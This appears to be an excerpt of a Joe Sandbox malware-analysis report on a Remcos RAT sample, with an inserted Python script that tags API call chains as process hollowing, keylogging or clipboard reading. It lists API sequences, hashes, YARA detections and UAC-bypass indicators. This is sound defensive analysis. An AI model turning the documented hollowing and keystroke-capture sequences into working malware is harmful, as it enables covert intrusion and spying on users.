                  Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 4_2_004132D2 OpenProcess,NtQueryInformationProcess,GetCurrentProcess,DuplicateHandle,GetFinalPathNameByHandleW,CloseHandle,CreateFileMappingW,MapViewOfFile,GetFileSize,UnmapViewOfFile,CloseHandle,CloseHandle,CloseHandle
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 4_2_0041BB09 OpenProcess,NtSuspendProcess,CloseHandle
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 4_2_0041BB35 OpenProcess,NtResumeProcess,CloseHandle
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 4_1_004180EF GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,TerminateProcess,GetModuleHandleA,GetProcAddress,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,TerminateProcess,GetLastError
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 4_1_004132D2 OpenProcess,NtQueryInformationProcess,GetCurrentProcess,DuplicateHandle,GetFinalPathNameByHandleW,CloseHandle,CreateFileMappingW,MapViewOfFile,GetFileSize,UnmapViewOfFile,CloseHandle,CloseHandle,CloseHandle
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 4_1_0041BB09 OpenProcess,NtSuspendProcess,CloseHandle
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 4_1_0041BB35 OpenProcess,NtResumeProcess,CloseHandle
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 5_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 5_2_00401806 NtdllDefWindowProc_W
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 5_2_004018C0 NtdllDefWindowProc_W
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exe | Code function: 0_2_028DCA6C CreateProcessAsUserW,WaitForSingleObject,CloseHandle,CloseHandle
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 4_2_004167B4 ExitWindowsEx,LoadLibraryA,GetProcAddress
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 4_1_004167B4 ExitWindowsEx,LoadLibraryA,GetProcAddress
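The API chains above are the evidence behind several of the report's signatures: the 0_2_028D7F48 and 4_2_004180EF chains (CreateProcess, NtUnmapViewOfSection, NtWriteVirtualMemory or WriteProcessMemory, SetThreadContext, ResumeThread) are the classic process-hollowing sequence, the 4_2_0040A3E0 chain (GetForegroundWindow, GetKeyboardState, ToUnicodeEx) is how the keylogger turns virtual-key state into characters, and the 4_2_0040B70E chain reads the clipboard. The script below is an added example written for this edit, not part of the Joe Sandbox report or of any vendor tool: it parses rows copied verbatim from this report and tags each function with the behaviour its API chain implies. The rule sets are the editor's own heuristics, not Joe Sandbox's signature logic.

```python
import re

# Rows copied verbatim from this report (not constructed). In the extracted page
# the "Source" cell is fused to "Code function: <pid_stage_addr> <API chain>" and
# the function id is repeated at the end of the row; the parser tolerates both.
REPORT_ROWS = [
    "Source: C:\\Users\\Public\\Libraries\\lhgtogaW.pifCode function: 4_2_0040A3E0 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,4_2_0040A3E0",
    "Source: C:\\Users\\user\\Desktop\\SHEOrder-10524.exeCode function: 0_2_028D7F48 CreateProcessAsUserW,GetThreadContext,Wow64GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtWriteVirtualMemory,NtWriteVirtualMemory,SetThreadContext,Wow64SetThreadContext,NtResumeThread,0_2_028D7F48",
    "Source: C:\\Users\\Public\\Libraries\\lhgtogaW.pifCode function: 4_2_004180EF GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetModuleHandleA,GetProcAddress,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError,4_2_004180EF",
    "Source: C:\\Users\\Public\\Libraries\\lhgtogaW.pifCode function: 4_2_0040B70E OpenClipboard,GetClipboardData,CloseClipboard,4_2_0040B70E",
    "Source: C:\\Users\\Public\\Libraries\\lhgtogaW.pifCode function: 4_2_0041C9E2 SystemParametersInfoW,4_2_0041C9E2",
]

# Editor's heuristics (assumption, not the sandbox's logic). Each rule is a list of
# requirements; a requirement is met when any one of its alternative APIs is present.
RULES = {
    "process_hollowing": [
        {"CreateProcessW", "CreateProcessA", "CreateProcessAsUserW"},
        {"NtUnmapViewOfSection"},
        {"NtWriteVirtualMemory", "WriteProcessMemory", "NtMapViewOfSection"},
        {"SetThreadContext", "Wow64SetThreadContext"},
        {"NtResumeThread", "ResumeThread"},
    ],
    "keystroke_translation": [
        {"GetForegroundWindow"},
        {"GetKeyboardState", "GetKeyState"},
        {"ToUnicodeEx", "ToUnicode", "ToAscii"},
    ],
    "clipboard_read": [
        {"OpenClipboard"},
        {"GetClipboardData"},
    ],
}

# Function ids look like <pid>_<stage>_<8 hex digits>; the chain follows, comma separated.
ROW_RE = re.compile(r"Code function:\s*(\d+_\d+_[0-9A-Fa-f]{8})\s*(.*)$")


def parse_row(row: str):
    """Return (function_id, [api, ...]) or None when the row has no Code function cell."""
    m = ROW_RE.search(row)
    if not m:
        return None
    fid, chain = m.group(1), m.group(2)
    # Drop empty fields and the trailing repeat of the function id.
    apis = [a for a in chain.split(",") if a and a != fid]
    return fid, apis


def classify(apis) -> list:
    """Names of every rule whose requirements are all satisfied by the API chain."""
    present = set(apis)
    return [name for name, reqs in RULES.items() if all(present & alt for alt in reqs)]


def triage(rows) -> dict:
    """Map each function id found in the report rows to the behaviours its chain implies."""
    result = {}
    for row in rows:
        parsed = parse_row(row)
        if parsed:
            fid, apis = parsed
            result[fid] = classify(apis)
    return result


if __name__ == "__main__":
    for fid, tags in triage(REPORT_ROWS).items():
        print(fid, tags or ["no rule matched"])
```

Order inside the chain is deliberately ignored: Joe Sandbox lists the imports a function reaches, not the runtime call order, so a sequence-aware rule would produce false negatives on rows like 4_2_004180EF, where NtUnmapViewOfSection appears both before and after the write. SystemParametersInfoW alone (4_2_0041C9E2, the wallpaper change) matches nothing here, which is the right outcome for a single benign API.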
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exe | Code function: 0_2_028C20C4
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 4_2_0043E0CC
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 4_2_0041F0FA
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 4_2_00454159
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 4_2_00438168
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 4_2_004461F0
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 4_2_0043E2FB
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 4_2_0045332B
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 4_2_0042739D
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 4_2_004374E6
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 4_2_0043E558
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 4_2_00438770
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 4_2_004378FE
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 4_2_00433946
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 4_2_0044D9C9
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 4_2_00427A46
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 4_2_0041DB62
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 4_2_00427BAF
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 4_2_00437D33
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 4_2_00435E5E
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 4_2_00426E0E
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 4_2_0043DE9D
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 4_2_00413FCA
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 4_2_00436FEA
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 4_2_274CB5C1
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 4_2_274D7194
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 4_1_0043E0CC
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 4_1_0041F0FA
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 4_1_00454159
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 4_1_00438168
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 4_1_004461F0
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 4_1_0043E2FB
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 4_1_0045332B
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 4_1_0042739D
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 4_1_004374E6
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 4_1_0043E558
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 4_1_00438770
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 4_1_004378FE
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 4_1_00433946
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 4_1_0044D9C9
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 4_1_00427A46
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 4_1_0041DB62
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 4_1_00427BAF
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 4_1_00437D33
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 4_1_00435E5E
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 4_1_00426E0E
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 4_1_0043DE9D
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 4_1_00413FCA
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 4_1_00436FEA
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 5_2_0044B040
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 5_2_0043610D
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 5_2_00447310
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 5_2_0044A490
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 5_2_0040755A
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 5_2_0043C560
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 5_2_0044B610
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 5_2_0044D6C0
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 5_2_004476F0
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 5_2_0044B870
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 5_2_0044081D
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 5_2_00414957
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 5_2_004079EE
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 5_2_00407AEB
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 5_2_0044AA80
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 5_2_00412AA9
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 5_2_00404B74
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 5_2_00404B03
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 5_2_0044BBD8
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 5_2_00404BE5
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 5_2_00404C76
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 5_2_00415CFE
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 5_2_00416D72
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 5_2_00446D30
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 5_2_00446D8B
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 5_2_00406E8F
                  Source: Joe Sandbox View | Dropped File: C:\Users\Public\Libraries\easinvoker.exe 30951DB8BFC21640645AA9144CFEAA294BB7C6980EF236D28552B6F4F3F92A96
                  Source: Joe Sandbox View | Dropped File: C:\Users\Public\Libraries\lhgtogaW.pif 7BCDC2E607ABC65EF93AFD009C3048970D9E8D1C2A18FC571562396B13EBB301
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exe | Code function: String function: 028C44A0 appears 67 times
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exe | Code function: String function: 028C4824 appears 883 times
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exe | Code function: String function: 028C4698 appears 247 times
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exe | Code function: String function: 028D7BE8 appears 45 times
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exe | Code function: String function: 028C6658 appears 32 times
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: String function: 00434E10 appears 108 times
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: String function: 0040417E appears 46 times
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: String function: 00402093 appears 100 times
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: String function: 00434770 appears 82 times
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: String function: 004169A7 appears 87 times
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: String function: 0044DB70 appears 41 times
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: String function: 004165FF appears 35 times
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: String function: 00411F67 appears 32 times
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: String function: 004020DF appears 40 times
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: String function: 004484CA appears 36 times
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: String function: 004046F7 appears 34 times
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: String function: 00402213 appears 38 times
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: String function: 004052FD appears 32 times
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: String function: 00401E65 appears 70 times
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: String function: 00401FAB appears 42 times
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: String function: 00457A28 appears 34 times
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: String function: 00416760 appears 69 times
                  Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: String function: 004458D0 appears 56 times
                  Source: netutils.dll.0.dr | Static PE information: Number of sections : 19 > 10
                  Source: SHEOrder-10524.exe | Binary or memory string: OriginalFilename vs SHEOrder-10524.exe
                  Source: SHEOrder-10524.exe, 00000000.00000002.1730288675.0000000013B70000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameLOADER.EXEB vs SHEOrder-10524.exe
                  Source: SHEOrder-10524.exe, 00000000.00000002.1730288675.0000000013B70000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameeasinvoker.exej% vs SHEOrder-10524.exe
                  Source: SHEOrder-10524.exe, 00000000.00000002.1730288675.0000000013B70000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTruesight4 vs SHEOrder-10524.exe
                  Source: SHEOrder-10524.exe, 00000000.00000003.1713246156.000000007E8F0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameeasinvoker.exej% vs SHEOrder-10524.exe
                  Source: SHEOrder-10524.exe, 00000000.00000003.1713246156.000000007E8F0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTruesight4 vs SHEOrder-10524.exe
                  Source: SHEOrder-10524.exe, 00000000.00000003.1713537001.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTruesight4 vs SHEOrder-10524.exe
                  Source: SHEOrder-10524.exe, 00000000.00000002.1720579954.00000000028EB000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameLOADER.EXEB vs SHEOrder-10524.exe
                  Source: SHEOrder-10524.exe, 00000000.00000003.1676709365.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameLOADER.EXEB vs SHEOrder-10524.exe
                  Source: SHEOrder-10524.exe, 00000000.00000002.1732244936.0000000014BF0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameLOADER.EXEB vs SHEOrder-10524.exe
                  Source: SHEOrder-10524.exe, 00000000.00000002.1732244936.0000000014BF0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameeasinvoker.exej% vs SHEOrder-10524.exe
                  Source: SHEOrder-10524.exe, 00000000.00000002.1734320711.000000007EE40000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameeasinvoker.exej% vs SHEOrder-10524.exe
                  Source: SHEOrder-10524.exe, 00000000.00000002.1734320711.000000007EE40000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTruesight4 vs SHEOrder-10524.exe
                  Source: SHEOrder-10524.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: 4.2.lhgtogaW.pif.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 (reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23)
Source: 4.2.lhgtogaW.pif.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants (Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda)
Source: 4.2.lhgtogaW.pif.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM (author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003))
Source: 10.1.lhgtogaW.pif.400000.3.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965
Source: 10.1.lhgtogaW.pif.400000.3.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants
Source: 10.1.lhgtogaW.pif.400000.3.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM
Source: 4.1.lhgtogaW.pif.400000.3.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965
Source: 4.1.lhgtogaW.pif.400000.3.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants
Source: 4.1.lhgtogaW.pif.400000.3.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM
Source: 14.1.lhgtogaW.pif.400000.3.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965
Source: 14.1.lhgtogaW.pif.400000.3.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants
Source: 14.1.lhgtogaW.pif.400000.3.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM
Source: 14.1.lhgtogaW.pif.400000.3.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965
Source: 14.1.lhgtogaW.pif.400000.3.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants
Source: 14.1.lhgtogaW.pif.400000.3.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM
Source: 4.2.lhgtogaW.pif.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965
Source: 4.2.lhgtogaW.pif.400000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants
Source: 4.2.lhgtogaW.pif.400000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM
Source: 4.1.lhgtogaW.pif.400000.3.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965
Source: 4.1.lhgtogaW.pif.400000.3.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants
Source: 4.1.lhgtogaW.pif.400000.3.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM
Source: 10.1.lhgtogaW.pif.400000.3.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965
Source: 10.1.lhgtogaW.pif.400000.3.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants
Source: 10.1.lhgtogaW.pif.400000.3.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM
Source: 0000000A.00000001.1882448821.0000000000490000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965
Source: 00000000.00000003.1717116451.000000007E700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965
Source: 00000004.00000001.1717466391.0000000000490000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965
Source: 00000004.00000002.4137990797.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965
Source: 00000004.00000002.4137990797.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants
Source: 00000004.00000002.4137990797.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM
Source: 0000000E.00000001.1938580336.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965
Source: 00000004.00000002.4137990797.0000000000490000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965
Source: 0000000E.00000001.1938580336.0000000000490000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965
Source: 00000000.00000002.1733060343.000000007E790000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965
Source: 0000000A.00000001.1882448821.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965
Source: 0000000E.00000001.1938580336.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965
Source: 0000000E.00000001.1938580336.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants
Source: 0000000E.00000001.1938580336.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM
Source: 00000004.00000002.4137990797.0000000000AC0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965
Source: 00000004.00000001.1717466391.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965
Source: 0000000A.00000001.1882448821.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965
Source: 0000000A.00000001.1882448821.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants
Source: 0000000A.00000001.1882448821.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM
Source: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965
Source: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants
Source: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM
Source: Process Memory Space: SHEOrder-10524.exe PID: 7276, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965
Source: Process Memory Space: lhgtogaW.pif PID: 7432, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965
Source: Process Memory Space: lhgtogaW.pif PID: 7868, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965
Source: Process Memory Space: lhgtogaW.pif PID: 8068, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965
Source: C:\Users\Public\Libraries\WagotghlO.bat, type: DROPPED | Matched rule: MALWARE_BAT_KoadicBAT (author = ditekSHen, description = Koadic post-exploitation framework BAT payload)
Source: classification engine | Classification label: mal100.rans.phis.troj.spyw.expl.evad.winEXE@21/12@4/3
Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 5_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,??3@YAXPAX@Z
Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 4_2_00417952 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError
Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 4_1_00417952 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError
Source: C:\Users\user\Desktop\SHEOrder-10524.exe | Code function: 0_2_028C7F8E GetDiskFreeSpaceA
Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 4_2_0040F474 GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle
Source: C:\Users\user\Desktop\SHEOrder-10524.exe | Code function: 0_2_028D6D84 CoCreateInstance
Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 4_2_0041B4A8 FindResourceA,LoadResource,LockResource,SizeofResource
Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 4_2_0041AA4A OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle
Source: C:\Users\user\Desktop\SHEOrder-10524.exe | File created: C:\Users\Public\Libraries\Null
Source: C:\Users\Public\Libraries\lhgtogaW.pif | Mutant created: \Sessions\1\BaseNamedObjects\Rmc-V052BG
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7376:120:WilError_03
Source: C:\Users\Public\Libraries\lhgtogaW.pif | File created: C:\Users\user\AppData\Local\Temp\bhv1938.tmp
